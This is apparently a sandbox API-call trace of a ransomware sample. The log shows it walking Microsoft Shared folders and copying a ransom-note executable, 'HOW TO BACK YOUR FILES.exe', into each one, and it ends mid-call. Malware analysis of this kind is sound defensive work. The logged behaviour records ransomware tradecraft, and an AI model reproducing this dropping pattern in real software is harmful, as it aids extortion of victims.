[0075.071] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN" [0075.071] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.077] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e400bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e400bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.077] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.077] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.078] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR" [0075.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0075.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0075.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned 60 [0075.078] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR" [0075.078] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.078] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.086] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.086] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e426d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e426d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.086] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.086] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.086] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN" [0075.086] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0075.086] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0075.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned 60 [0075.086] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN" [0075.086] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.086] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.090] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e426d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e426d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.090] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.090] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.090] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR" [0075.090] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0075.090] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0075.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned 60 [0075.091] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR" [0075.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.096] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.096] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e44ce80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e44ce80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.096] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.096] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.096] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES" [0075.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0075.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0075.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned 60 [0075.096] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES" [0075.096] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.096] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.100] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.100] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e44ce80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e44ce80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.100] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.100] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.101] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR" [0075.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0075.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0075.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned 60 [0075.101] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR" [0075.101] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.101] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.105] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e44ce80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e44ce80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.105] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.105] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14" [0075.105] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0075.105] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0075.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned 55 [0075.105] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14" [0075.105] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.105] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.112] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.112] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e472fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e472fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.113] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.113] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.114] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR" [0075.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0075.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6508 | out: hHeap=0x2b0000) returned 1 [0075.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR") returned 64 [0075.114] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR" [0075.114] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.114] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.125] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e472fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e472fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.126] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.126] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.126] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER" [0075.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1150 | out: hHeap=0x2b0000) returned 1 [0075.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2a00 | out: hHeap=0x2b0000) returned 1 [0075.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER") returned 61 [0075.126] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER" [0075.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.133] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.133] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e499140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e499140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.134] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.134] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.134] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG" [0075.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0075.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d29e0 | out: hHeap=0x2b0000) returned 1 [0075.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned 64 [0075.134] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG" [0075.134] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.134] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.140] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.140] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e499140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e499140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.140] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.140] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.141] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO" [0075.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f10c8 | out: hHeap=0x2b0000) returned 1 [0075.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d29c0 | out: hHeap=0x2b0000) returned 1 [0075.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned 62 [0075.141] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO" [0075.141] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.141] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.146] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.146] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e4bf2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e4bf2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.146] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.146] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.146] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE" [0075.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0075.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d29a0 | out: hHeap=0x2b0000) returned 1 [0075.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned 64 [0075.147] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE" [0075.147] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.147] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.154] lstrcatW (in: lpString1="", lpString2="\\*" | out: 